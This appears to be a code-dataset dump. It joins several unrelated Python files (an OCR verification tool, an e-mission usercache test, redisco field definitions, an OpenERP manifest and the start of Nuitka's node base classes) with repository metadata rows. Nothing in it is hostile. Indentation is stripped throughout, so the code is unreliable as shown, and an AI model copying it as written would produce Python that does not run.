if sample.verified:
verified = verified + 1
if isinstance(sample.result, Sample):
verified, total = _verification_status_recursive(
sample.result, verified, total)
elif isinstance(sample.result, list):
for samp in sample.result:
verified, total = _verification_status_recursive(
samp, verified, total)
return verified, total
def _mutate_recalculate_list(
list_update, new_items, compare_func, calc_func):
"""update samples in a list, recalculating items that have changed"""
# list_update is a list of Samples
# new_items are not samples; calc_func will take one of these and return
# a Sample
res = []
for item in new_items:
found = False
for old_item in list_update:
if compare_func(item, old_item.data):
print(old_item.data)
# y.verified = True
res.append(old_item)
found = True
break
if not found:
print("recalculating", item)
sample = calc_func(item)
# sample.verified = True
res.append(sample)
print("done updating list")
list_update[:] = res
def _mutate_verify_line_poss(image_sample, process_line_position):
"""verify positions of lines"""
print("Verify the positions of the lines.")
print("left mouse button: create a new line with two clicks")
print("right mouse button: delete the nearest line")
print("escape: done")
print()
lines = [x.data for x in image_sample.result]
lines_verified = annotate.annotate_lines(image_sample.data, lines)
# update what's been modified in the hierarchy
calc_func = lambda x: process_line_position(x, image_sample.data)
_mutate_recalculate_list(
image_sample.result, lines_verified, np.allclose, calc_func)
image_sample.verified = True
for samp in image_sample.result: # verify line position samples
samp.verified = True
def _mutate_verify_multi(
line_image_sample,
process_word_position,
process_char_position,
new_char_annotation_mode):
"""open different annotation options depending on click location
in line analysis image"""
window_title = "line analysis"
def draw():
"""refresh the view"""
lai = analysisimage.LineAnalysisImage(line_image_sample)
cv2.imshow(window_title, lai.image)
def on_mouse(event, mouse_x, mouse_y, flags, params):
"""helper"""
if event == cv2.EVENT_LBUTTONDOWN:
print(mouse_x, mouse_y, "left")
lai = analysisimage.LineAnalysisImage(line_image_sample)
if mouse_y >= lai.line_y_start and mouse_y < lai.line_y_end:
print("line")
print("Verify the positions of the words.")
print("left mouse button: create a new word with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
word_positions = [x.data for x in line_image_sample.result]
words_verified = annotate.annotate_word_positions(
line_image_sample.data, word_positions)
calc_func = lambda x: process_word_position(x, line_image_sample.data)
_mutate_recalculate_list(
line_image_sample.result, words_verified, np.allclose, calc_func)
line_image_sample.verified = True
for samp in line_image_sample.result: # verify word position samples
samp.verified = True
draw()
elif mouse_y >= lai.words_y_start and mouse_y < lai.words_y_end:
print("words")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_words_im_x,
[word_pos.data[1] - word_pos.data[0] for word_pos in word_positions],
analysisimage.HGAP_LARGE)
# TODO: work with word image sample instead
word_position_sample = word_positions[idx]
char_positions = [x.data for x in word_position_sample.result.result]
print("char positions:", char_positions)
if new_char_annotation_mode:
print("Verify the positions of the characters.")
print("left mouse button: create a new character with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
char_positions_verified = annotate.annotate_word_positions(
word_position_sample.result.data,
char_positions)
else:
print("Verify the positions of gaps between letters.")
print("left mouse button: create a new gap")
print("right mouse button: delete the nearest gap")
print("escape: done")
print()
char_gaps = findletters.positions_to_gaps(char_positions)
char_gaps_verified = annotate.annotate_letter_gaps(
word_position_sample.result.data,
char_gaps)
char_positions_verified = findletters.gaps_to_positions(char_gaps_verified)
print("char positions verified:", char_positions_verified)
calc_func = lambda x: process_char_position(x, word_position_sample.result.data)
_mutate_recalculate_list(
word_position_sample.result.result, char_positions_verified,
np.allclose, calc_func)
word_position_sample.result.verified = True # verify word image sample
for samp in word_position_sample.result.result: # verify char position samples
samp.verified = True
draw()
elif mouse_y >= lai.char_ims_y_start and mouse_y < lai.char_ims_y_end:
# verify character labels by word
print("char ims")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_char_ims_im_x,
[np.sum([char_pos.data[1] - char_pos.data[0] + analysisimage.HGAP_SMALL
for char_pos in word_pos.result.result]) - analysisimage.HGAP_SMALL
for word_pos in word_positions],
analysisimage.HGAP_LARGE)
patch_width = 96
patch_height = 96
pad = lambda x: improc.pad_image(x, patch_width, patch_height)
# TODO: most of this logic is to deal with the charclass interface
def pad_preds(preds):
"""helper"""
return [p.copy(data=(pad(p.data), None, p.data)) for p in preds]
def unpad_preds(preds):
"""helper"""
return [p.copy(data=(p.data[2], p.data[1])) for p in preds]
while idx < len(word_positions):
char_img_samples = [char_pos.result
for char_pos in word_positions[idx].result.result]
chars_working, chars_done = charclass.label_chars(pad_preds(char_img_samples))
# this is a bit of a hack, but it works well for now.
print(len(chars_working), len(chars_done))
if len(chars_done) == 0:
break
char_img_samples_verified = unpad_preds(chars_working) + unpad_preds(chars_done)
for org_sample, new_sample in zip(char_img_samples, char_img_samples_verified):
org_sample.result = new_sample.result
org_sample.verified = new_sample.verified
draw()
idx = idx + 1
elif mouse_y >= lai.chars_y_start and mouse_y < lai.chars_y_end:
print("chars")
cv2.waitKey(1)
if event == cv2.EVENT_RBUTTONDOWN:
print(mouse_x, mouse_y, "right")
cv2.waitKey(1)
cv2.namedWindow(window_title, cv2.WINDOW_NORMAL)
cv2.setMouseCallback(window_title, on_mouse, 0)
draw()
while True:
key = cv2.waitKey(0)
if key == 27:
break
if key == 13:
_mutate_set_verify_recursive(line_image_sample, True)
if key == 8:
_mutate_set_verify_recursive(line_image_sample, False)
draw()
cv2.destroyWindow(window_title)
def main(argv):
"""main program"""
if len(argv) < 3:
print("Usage: verify input_file <line | multi | view>")
sys.exit()
input_filename = argv[1]
verify_type = argv[2]
new_char_annotation_mode = False
# filename has a number version suffix
sample_filename = input_filename + ".sample.pkl"
sample_dirname, sample_basename = os.path.split(sample_filename)
possible_files = [x for x in os.listdir(sample_dirname)
if x.startswith(sample_basename)]
versions = [int_safe(x.split(".")[-1]) for x in possible_files]
latest_idx = np.argmax(versions)
latest_version = versions[latest_idx]
latest_filename = possible_files[latest_idx]
sample_filename_full = os.path.join(sample_dirname, latest_filename)
print("loading sample file:", sample_filename_full)
image_sample = util.load(sample_filename_full)
# with open(sample_filename_full, "rb") as sample_file:
# image_sample = pickle.load(sample_file)
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
(process_image,
process_line_position,
process_word_position,
process_char_position) = driver.current_best_process()
if verify_type == "line":
_mutate_verify_line_poss(image_sample, process_line_position)
elif verify_type == "view":
for line_pos in image_sample.result:
img = analysisimage.LineAnalysisImage(line_pos.result).image
cv2.namedWindow("line analysis", cv2.WINDOW_NORMAL)
cv2.imshow("line analysis", img)
cv2.waitKey()
else:
if len(argv) > 3:
start_idx = int(argv[3]) - 1
else:
start_idx = 0
for idx in range(start_idx, len(image_sample.result)):
line_pos = image_sample.result[idx]
print("editing line " + str(idx + 1) + " / " + str(len(image_sample.result)))
_mutate_verify_multi(
line_pos.result,
process_word_position, process_char_position,
new_char_annotation_mode)
if verify_type != "view":
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
sample_filename_full = sample_filename + "." + str(latest_version + 1)
print("writing sample file:", sample_filename_full)
util.save(image_sample, sample_filename_full)
# with open(sample_filename_full, "wb") as sample_file:
# pickle.dump(image_sample, sample_file)
if __name__ == "__main__":
main(sys.argv)
| bsd-3-clause | 6,504,261,244,183,423,000 | 37.606414 | 100 | 0.576801 | false |
yw374cornell/e-mission-server | emission/tests/netTests/TestBuiltinUserCacheHandlerOutput.py | 1 | 7090 | # Standard imports
import unittest
import datetime as pydt
import logging
import json
import uuid
import attrdict as ad
import time
import geojson as gj
import arrow
# Our imports
import emission.tests.common
import emission.core.get_database as edb
import emission.net.usercache.abstract_usercache as enua
import emission.storage.timeseries.abstract_timeseries as esta
import emission.net.usercache.abstract_usercache_handler as enuah
import emission.net.api.usercache as mauc
import emission.core.wrapper.trip as ecwt
import emission.storage.decorations.local_date_queries as ecsdlq
# These are the current formatters, so they are included here for testing.
# However, it is unclear whether or not we need to add other tests as we add other formatters,
# especially if they follow the same pattern.
class TestBuiltinUserCacheHandlerOutput(unittest.TestCase):
def setUp(self):
emission.tests.common.dropAllCollections(edb.get_db())
self.testUserUUID1 = uuid.uuid4()
self.testUserUUID2 = uuid.uuid4()
self.testUserUUIDios = uuid.uuid4()
self.activity_entry = json.load(open("emission/tests/data/netTests/android.activity.txt"))
self.location_entry = json.load(open("emission/tests/data/netTests/android.location.raw.txt"))
self.transition_entry = json.load(open("emission/tests/data/netTests/android.transition.txt"))
self.entry_list = [self.activity_entry, self.location_entry, self.transition_entry]
self.uc1 = enua.UserCache.getUserCache(self.testUserUUID1)
self.uc2 = enua.UserCache.getUserCache(self.testUserUUID2)
self.ucios = enua.UserCache.getUserCache(self.testUserUUIDios)
self.ts1 = esta.TimeSeries.get_time_series(self.testUserUUID1)
self.ts2 = esta.TimeSeries.get_time_series(self.testUserUUID2)
self.tsios = esta.TimeSeries.get_time_series(self.testUserUUIDios)
for entry in self.entry_list:
# Needed because otherwise we get a DuplicateKeyError while
# inserting the multiple copies
del entry["_id"]
self.curr_ts = int(time.time())
for offset in range(self.curr_ts - 5 * 60, self.curr_ts, 30):
for entry in self.entry_list:
entry["metadata"]["write_ts"] = offset * 1000
mauc.sync_phone_to_server(self.testUserUUID1, self.entry_list)
for offset in range(self.curr_ts - 7 * 60 + 1, self.curr_ts - 2 * 60 + 1, 30):
for entry in self.entry_list:
entry["metadata"]["write_ts"] = offset * 1000
mauc.sync_phone_to_server(self.testUserUUID2, self.entry_list)
self.ios_activity_entry = json.load(open("emission/tests/data/netTests/ios.activity.txt"))
self.ios_location_entry = json.load(open("emission/tests/data/netTests/ios.location.txt"))
self.ios_transition_entry = json.load(open("emission/tests/data/netTests/ios.transition.txt"))
self.ios_entry_list = [self.ios_activity_entry, self.ios_location_entry, self.ios_transition_entry]
for entry in self.ios_entry_list:
# Needed because otherwise we get a DuplicateKeyError while
# inserting the multiple copies
del entry["_id"]
for offset in range(self.curr_ts - 5 * 60, self.curr_ts, 30):
for entry in self.ios_entry_list:
entry["metadata"]["write_ts"] = offset
mauc.sync_phone_to_server(self.testUserUUIDios, self.ios_entry_list)
# The first query for every platform is likely to work
# because startTs = None and endTs, at least for iOS, is way out there.
# But on the next call, if we are multiplying by 1000, it won't work any more,
# so let's add a new test for this.
def testGetLocalDay(self):
adt = arrow.get(pydt.datetime(2016, 1, 1, 9, 46, 0, 0))
test_dt = ecsdlq.get_local_date(adt.timestamp, "America/Los_Angeles")
test_trip = ecwt.Trip({'start_local_dt': test_dt, 'start_fmt_time': adt.isoformat()})
test_handler = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
self.assertEqual(test_handler.get_local_day_from_fmt_time(test_trip), "2016-01-01")
self.assertEqual(test_handler.get_local_day_from_local_dt(test_trip), "2016-01-01")
def testGetTripListForSevenDays(self):
test_handler = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
def testGetObsoleteEntries(self):
valid_entries = ["2015-12-30", "2015-12-29", "2015-12-31", "2015-01-01"]
uc = enua.UserCache.getUserCache(self.testUserUUID1)
uch = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
uc.putDocument("2015-12-30", {"a": 1})
uc.putDocument("2015-12-29", {"a": 1})
uc.putDocument("2015-12-28", {"a": 1})
uc.putDocument("2015-12-27", {"a": 1})
uc.putDocument("2015-12-26", {"a": 1})
obsolete_entries = uch.get_obsolete_entries(uc, valid_entries)
# the result should include entries that are in the past (28,27,26), but should
# NOT include newly added entries
self.assertEqual(obsolete_entries, set(["2015-12-28", "2015-12-27", "2015-12-26"]))
def testDeleteObsoleteEntries(self):
valid_bins = {"2015-12-30":[{"b": 2}],
"2015-12-29":[{"b": 2}],
"2015-12-31":[{"b": 2}]}
uc = enua.UserCache.getUserCache(self.testUserUUID1)
uch = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
uc.putDocument("2015-12-30", {"a": 1})
uc.putDocument("2015-12-29", {"a": 1})
uc.putDocument("2015-12-28", {"a": 1})
uc.putDocument("2015-12-27", {"a": 1})
uc.putDocument("2015-12-26", {"a": 1})
uch.delete_obsolete_entries(uc, list(valid_bins.iterkeys()))
# the result should include entries that are in the past (28,27,26), but should
# NOT include newly added entries
self.assertEqual(uc.getDocumentKeyList(), ["2015-12-30", "2015-12-29"])
def testRetainSetConfig(self):
valid_bins = {"2015-12-30":[{"b": 2}],
"2015-12-29":[{"b": 2}],
"2015-12-31":[{"b": 2}]}
uc = enua.UserCache.getUserCache(self.testUserUUID1)
uch = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
uc.putDocument("2015-12-30", {"a": 1})
uc.putDocument("2015-12-29", {"a": 1})
uc.putDocument("2015-12-28", {"a": 1})
uc.putDocument("2015-12-27", {"a": 1})
uc.putDocument("2015-12-26", {"a": 1})
uc.putDocument("config/sensor_config", {"a": 1})
uch.delete_obsolete_entries(uc, list(valid_bins.iterkeys()))
# the result should include entries that are in the past (28,27,26), but should
# NOT include newly added entries
self.assertEqual(uc.getDocumentKeyList(), ["2015-12-30", "2015-12-29",
"config/sensor_config"])
if __name__ == '__main__':
import emission.tests.common as etc
etc.configLogging()
unittest.main()
| bsd-3-clause | -6,776,570,745,570,059,000 | 48.236111 | 107 | 0.651058 | false |
heckj/redisco | redisco/models/attributes.py | 1 | 15052 | # -*- coding: utf-8 -*-
"""
Defines the fields that can be added to redisco models.
"""
import sys
from datetime import datetime, date
from dateutil.tz import tzutc, tzlocal
from calendar import timegm
from redisco.containers import List
from exceptions import FieldValidationError, MissingID
__all__ = ['Attribute', 'CharField', 'ListField', 'DateTimeField',
'DateField', 'ReferenceField', 'Collection', 'IntegerField',
'FloatField', 'BooleanField', 'Counter']
class Attribute(object):
"""Defines an attribute of the model.
The attribute accepts strings, and values are stored in Redis
as they are - plain strings.
Options
name -- alternate name of the attribute. This will be used
as the key to use when interacting with Redis.
indexed -- Index this attribute. Unindexed attributes cannot
be used in queries. Default: True.
unique -- validates the uniqueness of the value of the
attribute.
validator -- a callable that can validate the value of the
attribute.
default -- Initial value of the attribute.
"""
def __init__(self,
name=None,
indexed=True,
required=False,
validator=None,
unique=False,
default=None):
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default
self.unique = unique
self.zindexable = False
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if callable(self.default):
default = self.default()
else:
default = self.default
self.__set__(instance, default)
return default
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def typecast_for_read(self, value):
"""Typecasts the value for reading from Redis."""
# The redis client encodes all unicode data to utf-8 by default.
return value.decode('utf-8')
def typecast_for_storage(self, value):
"""Typecasts the value for storing to Redis."""
try:
return unicode(value)
except UnicodeError:
return value.decode('utf-8')
def value_type(self):
return unicode
def acceptable_types(self):
return basestring
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
# type_validation
if val is not None and not isinstance(val, self.acceptable_types()):
errors.append((self.name, 'bad type',))
# validate first standard stuff
if self.required:
if val is None or not unicode(val).strip():
errors.append((self.name, 'required'))
# validate uniqueness
if val and self.unique:
error = self.validate_uniqueness(instance, val)
if error:
errors.append(error)
# validate using validator
if self.validator:
r = self.validator(self.name, val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
def validate_uniqueness(self, instance, val):
encoded = self.typecast_for_storage(val)
matches = instance.__class__.objects.filter(**{self.name: encoded})
if len(matches) > 0:
try:
instance_id = instance.id
no_id = False
except MissingID:
no_id = True
if (len(matches) != 1) or no_id or (
matches.first().id != instance.id):
return (self.name, 'not unique',)
class CharField(Attribute):
def __init__(self, max_length=255, **kwargs):
super(CharField, self).__init__(**kwargs)
self.max_length = max_length
def validate(self, instance):
errors = []
super(CharField, self).validate(instance)
val = getattr(instance, self.name)
if val and len(val) > self.max_length:
errors.append((self.name, 'exceeds max length'))
if errors:
raise FieldValidationError(errors)
class BooleanField(Attribute):
def typecast_for_read(self, value):
return bool(int(value))
def typecast_for_storage(self, value):
if value is None:
return "0"
return "1" if value else "0"
def value_type(self):
return bool
def acceptable_types(self):
return self.value_type()
class IntegerField(Attribute):
def __init__(self, **kwargs):
super(IntegerField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return int(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return unicode(value)
def value_type(self):
return int
def acceptable_types(self):
return (int, long)
class FloatField(Attribute):
def __init__(self, **kwargs):
super(FloatField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return float(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return "%f" % value
def value_type(self):
return float
def acceptable_types(self):
return self.value_type()
class DateTimeField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateTimeField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
# The stored value is an epoch timestamp (see typecast_for_storage);
# load it back as a timezone-aware datetime in UTC.
dt = datetime.fromtimestamp(float(value), tzutc())
return dt
except (TypeError, ValueError):
return None
def typecast_for_storage(self, value):
if not isinstance(value, datetime):
raise TypeError("%s should be datetime object, and not a %s" %
(self.name, type(value)))
if value is None:
return None
# Are we timezone aware ? If no, make it TimeZone Local
if value.tzinfo is None:
value = value.replace(tzinfo=tzlocal())
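# The stored form is "<epoch seconds>.<microseconds>", e.g.
# datetime(2013, 1, 1, tzinfo=tzutc()) -> "1356998400.000000".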
return "%d.%06d" % (float(timegm(value.utctimetuple())),
value.microsecond)
def value_type(self):
return datetime
def acceptable_types(self):
return self.value_type()
class DateField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
dt = date.fromordinal(int(value))
return dt
except (TypeError, ValueError):
return None
def typecast_for_storage(self, value):
if not isinstance(value, date):
raise TypeError("%s should be date object, and not a %s" %
(self.name, type(value)))
if value is None:
return None
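# Stored as the proleptic Gregorian ordinal, e.g. date(2013, 1, 1) -> "734869".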
return "%d" % value.toordinal()
def value_type(self):
return date
def acceptable_types(self):
return self.value_type()
class ListField(object):
"""Stores a list of objects.
target_type -- can be a Python object or a redisco model class.
If target_type is not a redisco model class, the target_type should
also be a callable that casts the (string) value of a list element into
target_type. E.g. str, unicode, int, float.
ListField also accepts a string that refers to a redisco model.
"""
def __init__(self, target_type,
name=None,
indexed=True,
required=False,
validator=None,
default=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default or []
from base import Model
self._redisco_model = (isinstance(target_type, basestring) or
issubclass(target_type, Model))
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if instance.is_new():
val = self.default
else:
key = instance.key(att=self.name)
val = List(key).members
if val is not None:
klass = self.value_type()
if self._redisco_model:
val = filter(lambda o: o is not None,
[klass.objects.get_by_id(v) for v in val])
else:
val = [klass(v) for v in val]
self.__set__(instance, val)
return val
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def value_type(self):
if isinstance(self._target_type, basestring):
t = self._target_type
from base import get_model_from_key
self._target_type = get_model_from_key(self._target_type)
if self._target_type is None:
raise ValueError("Unknown Redisco class %s" % t)
return self._target_type
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, list):
errors.append((self.name, 'bad type'))
else:
for item in val:
if not isinstance(item, self.value_type()):
errors.append((self.name, 'bad type in list'))
# validate first standard stuff
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
class Collection(object):
"""
A descriptor that resolves the target model class on access and
returns the query of objects referencing this instance.
"""
def __init__(self, target_type):
self.target_type = target_type
def __get__(self, instance, owner):
if not isinstance(self.target_type, str):
raise TypeError("A collection only accepts a string "
"representing the Class")
# __import__ should be something like
# __import__('mymod.mysubmod', fromlist=['MyClass'])
klass_path = self.target_type.split(".")
fromlist = klass_path[-1]
frompath = ".".join(klass_path[0:-1])
# if the path is not empty, then it worth importing the class,
# otherwise, its a local Class and it's already been imported.
if frompath:
mod = __import__(frompath, fromlist=[fromlist])
else:
mod = sys.modules[__name__]
klass = getattr(mod, fromlist)
return klass.objects.filter(
**{instance.__class__.__name__.lower() + '_id': instance.id})
def __set__(self, instance, value):
"""
Prevent the attribute from being overridden
"""
raise AttributeError("can't override a collection of object")
class ReferenceField(object):
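"""Stores a reference to another redisco model instance.
Only the id of the referenced object is persisted, under the
attribute name '<name>_id' (see the `attname` property below).
"""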
def __init__(self,
target_type,
name=None,
attname=None,
indexed=True,
required=False,
related_name=None,
default=None,
validator=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self._attname = attname
self._related_name = related_name
self.validator = validator
self.default = default
def __set__(self, instance, value):
"""
Set the referenced object. Passing None simply removes
the reference.
"""
if not isinstance(value, self.value_type()) and \
value is not None:
raise TypeError
# remove the cached value from the instance
if hasattr(instance, '_' + self.name):
delattr(instance, '_' + self.name)
# Remove the attribute_id reference
setattr(instance, self.attname, None)
# Set it to the new value if any.
if value is not None:
setattr(instance, self.attname, value.id)
def __get__(self, instance, owner):
try:
if not hasattr(instance, '_' + self.name):
o = self.value_type().objects.get_by_id(
getattr(instance, self.attname))
setattr(instance, '_' + self.name, o)
return getattr(instance, '_' + self.name)
except AttributeError:
setattr(instance, '_' + self.name, self.default)
return self.default
def value_type(self):
return self._target_type
@property
def attname(self):
if self._attname is None:
self._attname = self.name + '_id'
return self._attname
@property
def related_name(self):
return self._related_name
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, self.value_type()):
errors.append((self.name, 'bad type for reference'))
# validate first standard stuff
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
class Counter(IntegerField):
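"""A read-only integer counter backed by a Redis hash field.
The value is read live from Redis on access and cannot be
assigned directly; `__set__` raises AttributeError.
"""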
def __init__(self, **kwargs):
super(Counter, self).__init__(**kwargs)
if 'default' not in kwargs or self.default is None:
self.default = 0
self.zindexable = True
def __set__(self, instance, value):
raise AttributeError("can't set a counter.")
def __get__(self, instance, owner):
if not instance.is_new():
v = instance.db.hget(instance.key(), self.name)
if v is None:
return 0
return int(v)
else:
return 0
| mit | -8,004,247,094,733,032,000 | 30.48954 | 76 | 0.554411 | false |
mathi123/vertical-construction | __unported__/account_invoice_insulation/__openerp__.py | 1 | 1644 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 Savoir-faire Linux (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name" : "Invoice Insulation",
"version" : "0.1",
"author" : "Savoir-faire Linux,Odoo Community Association (OCA)",
"website" : "http://www.savoirfairelinux.com",
"license" : "AGPL-3",
"category" : "Accounting",
"description" : """
This module allows you to generate invoices with thermal resistance for insulation products.
""",
"depends" : [
"account",
"product_insulation",
],
"images" : [],
"test" : [],
"demo" : [],
"data" : [
"report/account_invoice_insulation_report.xml",
"account_invoice_insulation_view.xml",
],
"installable": True,
"complexity": "easy",
}
| agpl-3.0 | -4,156,243,103,328,499,000 | 35.533333 | 92 | 0.599148 | false |
kayhayen/Nuitka | nuitka/nodes/NodeBases.py | 1 | 35111 | # Copyright 2021, Kay Hayen, mailto:[email protected]
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Node base classes.
These classes provide the generic base classes available for nodes,
statements and expressions alike. Expression-only base classes live
in a dedicated module.
"""
from abc import abstractmethod
from nuitka import Options, Tracing, TreeXML, Variables
from nuitka.__past__ import iterItems
from nuitka.Errors import NuitkaNodeDesignError, NuitkaNodeError
from nuitka.PythonVersions import python_version
from nuitka.SourceCodeReferences import SourceCodeReference
from nuitka.utils.InstanceCounters import (
counted_del,
counted_init,
isCountingInstances,
)
from .FutureSpecs import fromFlags
from .NodeMakingHelpers import makeStatementOnlyNodesFromExpressions
from .NodeMetaClasses import NodeCheckMetaClass, NodeMetaClassBase
class NodeBase(NodeMetaClassBase):
__slots__ = "parent", "source_ref"
# Avoid the attribute unless it's really necessary.
if Options.is_fullcompat:
__slots__ += ("effective_source_ref",)
# String to identify the node class, to be consistent with its name.
kind = None
@counted_init
def __init__(self, source_ref):
# The base class has no __init__ worth calling.
# Check source reference to meet basic standards, so we note errors
# when they occur.
assert source_ref is not None
assert source_ref.line is not None
self.parent = None
self.source_ref = source_ref
if isCountingInstances():
__del__ = counted_del()
@abstractmethod
def finalize(self):
pass
def __repr__(self):
return "<Node %s>" % (self.getDescription())
def getDescription(self):
"""Description of the node, intended for use in __repr__ and
graphical display.
"""
details = self.getDetailsForDisplay()
if details:
return "'%s' with %s" % (self.kind, details)
else:
return "'%s'" % self.kind
def getDetails(self):
"""Details of the node, intended for re-creation.
We are not using the pickle mechanisms, but this is basically
part of what the constructor call needs. Real children will
also be added.
"""
# Virtual method, pylint: disable=no-self-use
return {}
def getDetailsForDisplay(self):
"""Details of the node, intended for use in __repr__ and dumps.
This is also used for XML.
"""
return self.getDetails()
def getCloneArgs(self):
return self.getDetails()
def makeClone(self):
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **self.getCloneArgs())
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def makeCloneShallow(self):
args = self.getDetails()
args.update(self.getVisitableNodesNamed())
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **args)
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def getParent(self):
"""Parent of the node. Every node except modules have to have a parent."""
if self.parent is None and not self.isCompiledPythonModule():
# print self.getVisitableNodesNamed()
assert False, (self, self.source_ref)
return self.parent
def getChildName(self):
"""Return the role in the current parent, subject to changes."""
parent = self.getParent()
for key, value in parent.getVisitableNodesNamed():
if self is value:
return key
if type(value) is tuple:
if self in value:
return key, value.index(self)
return None
def getChildNameNice(self):
child_name = self.getChildName()
if hasattr(self.parent, "nice_children"):
return self.parent.nice_children[
self.parent.named_children.index(child_name)
]
elif hasattr(self.parent, "nice_child"):
return self.parent.nice_child
else:
return child_name
def getParentFunction(self):
"""Return the parent that is a function."""
parent = self.getParent()
while parent is not None and not parent.isExpressionFunctionBodyBase():
parent = parent.getParent()
return parent
def getParentModule(self):
"""Return the parent that is module."""
parent = self
while not parent.isCompiledPythonModule():
if hasattr(parent, "provider"):
                # After we have checked, we can use it; a much faster
                # route to take.
parent = parent.provider
else:
parent = parent.getParent()
return parent
def isParentVariableProvider(self):
        # Check if it's a closure giver, in which case it can provide variables.
return isinstance(self, ClosureGiverNodeMixin)
def getParentVariableProvider(self):
parent = self.getParent()
while not parent.isParentVariableProvider():
parent = parent.getParent()
return parent
def getParentReturnConsumer(self):
parent = self.getParent()
while (
not parent.isParentVariableProvider()
and not parent.isExpressionOutlineBody()
):
parent = parent.getParent()
return parent
def getParentStatementsFrame(self):
current = self.getParent()
while True:
if current.isStatementsFrame():
return current
if current.isParentVariableProvider():
return None
if current.isExpressionOutlineBody():
return None
current = current.getParent()
def getSourceReference(self):
return self.source_ref
def setCompatibleSourceReference(self, source_ref):
"""Bug compatible line numbers information.
        CPython reports the line of the last bit of bytecode executed,
        not the line where the operation starts. Calls, for example,
        report the line of the last argument, as opposed to the line
        of the call itself.
        For tests, we want to be compatible. In improved mode, we are
        not fully compatible, and just drop it altogether.
"""
# Getting the same source reference can be dealt with quickly, so do
# this first.
if (
self.source_ref is not source_ref
and Options.is_fullcompat
and self.source_ref != source_ref
):
            # An attribute outside of "__init__", so we save memory in
            # most cases. Very few cases involve splitting across lines.
# false alarm for non-slot:
# pylint: disable=I0021,assigning-non-slot,attribute-defined-outside-init
self.effective_source_ref = source_ref
def getCompatibleSourceReference(self):
"""Bug compatible line numbers information.
See above.
"""
return getattr(self, "effective_source_ref", self.source_ref)
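    # Illustrative example (assumed): for a call spanning lines 10-12, the
    # plain source_ref points at line 10, while the compatible reference may
    # point at line 12, matching the line that CPython reports.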
def asXml(self):
line = self.source_ref.getLineNumber()
result = TreeXML.Element("node", kind=self.__class__.__name__, line="%s" % line)
compat_line = self.getCompatibleSourceReference().getLineNumber()
if compat_line != line:
result.attrib["compat_line"] = str(compat_line)
for key, value in iterItems(self.getDetailsForDisplay()):
result.set(key, str(value))
for name, children in self.getVisitableNodesNamed():
role = TreeXML.Element("role", name=name)
result.append(role)
if children is None:
role.attrib["type"] = "none"
elif type(children) not in (list, tuple):
